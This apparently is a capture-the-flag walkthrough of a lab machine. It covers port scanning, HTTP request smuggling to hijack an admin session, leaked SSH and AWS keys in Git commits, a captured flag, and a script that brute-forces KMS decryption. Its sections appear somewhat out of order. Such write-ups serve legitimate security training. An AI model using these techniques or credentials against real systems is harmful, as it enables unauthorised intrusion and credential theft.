As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.93 scan initiated Tue Apr 18 07:04:49 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.225
Nmap scan report for 10.10.10.225
Host is up (0.050s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
5000/tcp open upnp
# Nmap done at Tue Apr 18 07:05:03 2023 -- 1 IP address (1 host up) scanned in 14.05 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
Intercept the request with BurpSuite, and remove unnecessary request headers.
The vulnerability occurs when the Transfer-Enconding header is sent together with a vertical tab. To insert the vertical tab into the BurpSuite request, echo and base64 encode it.
echo '\x0b' | base64
Cwo=
Then, add the Transfer-Enconding header together with the base64 encoded vertical tab, and base64 decode it with the decoder built-in tool from BurpSuite. We can show non-printable characters to make it more comfortable. Then, we will have to copy and paste the same request above and increment the Content-Length header.
Now, there are two new comments, and the second one has a session cookie different from ours.
Let's change it with the EditThisCookie extension.
If we reload the website, we'll see that we have become admin@sink.htb the user.
Inside the Notes section, we'll see three notes.
The three of them have credentials.
Back to the Gitea server, we'll see that it has a login page. And the credentials for the root user are the only valid ones.
There are four repositories inside.
The Key_Management repository is owned by marcus.
There are a few commits in the repository.
The Preparing for Prod commit shows an SSH private key in the hidden file .keys/dev_keys.
The .keys/dev_keys contains the private SSH key.
Let's copy it into the id_rsa file, and give it the right permissions. Then, log in as marcus, and we'll be able to grab the user flag.
nano id_rsa; chmod 600 id_rsa
ssh -i id_rsa marcus@10.10.10.225
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-80-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue 18 Apr 2023 04:03:12 PM UTC
System load: 0.19
Usage of /: 38.2% of 17.59GB
Memory usage: 57%
Swap usage: 0%
Processes: 298
Users logged in: 0
IPv4 address for br-85739d6e29c0: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for ens160: 10.10.10.225
IPv6 address for ens160: dead:beef::250:56ff:feb9:e98a
197 updates can be installed immediately.
115 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Jan 27 12:14:16 2021 from 10.10.14.4
marcus@sink:~$ whoami
marcus
marcus@sink:~$ cat user.txt
8c08168dabfa8d44d0556138ef603118
Privilege Escalation
Back to the Gitea server repositories, the Log_Management repository also has a bunch of commits.
The dev push for log group and stream creation commit contains private keys for AWS.
Using these keys, we could try to list AWS secrets. But first, we need to configure AWS with these keys.
aws configure
AWS Access Key ID [None]: AKIAIUEN3QWCPSTEITJQ
AWS Secret Access Key [None]: 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
Default region name [None]: eu
Default output format [None]: json
Now, as seen below, there are secrets we can access.
The credentials for david are the only ones that work.
su david
Password:
david@sink:/home/marcus$ whoami
david
There is one directory called Projects in his home directory.
ls -l
total 4
drwxr-x--- 3 david david 4096 Dec 2 2020 Projects
This folder contains a file which is encrypted.
ls -lR
Projects/:
total 4
drwxrwx--- 2 david david 4096 Feb 1 2021 Prod_Deployment
Projects/Prod_Deployment:
total 4
-rw-r----- 1 david david 512 Feb 1 2021 servers.enc
We can try to decrypt the file with AWS. But first, we need to reconfigure AWS again.
aws configure
AWS Access Key ID [None]: AKIAIUEN3QWCPSTEITJQ
AWS Secret Access Key [None]: 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
Default region name [None]: eu
Default output format [None]: json
The following script will take each key stored with aws kms, and it will try to decrypt the servers.enc file using one of the possible encryption algorithms.
nano
#!/bin/bash
algorithms="SYMMETRIC_DEFAULT RSAES_OAEP_SHA_1 RSAES_OAEP_SHA_256"
keys=$(aws kms --endpoint-url="http://127.0.0.1:4566" list-keys | grep KeyId | awk '{print $2}' | tr -d '",')
for algorithm in $algorithms; do
for key in $keys; do
aws kms --endpoint-url="http://127.0.0.1:4566" decrypt --ciphertext-blob fileb:///home/david/Projects/Prod_Deployment/servers.enc --key-id $key --encryption-algorithm $algorithm
done
done
This is a type of proxy which is vulnerable to HTTP request smuggling or HTTP Desync attacks as we can see . Let's test it out. On the main page, we could leave a comment.
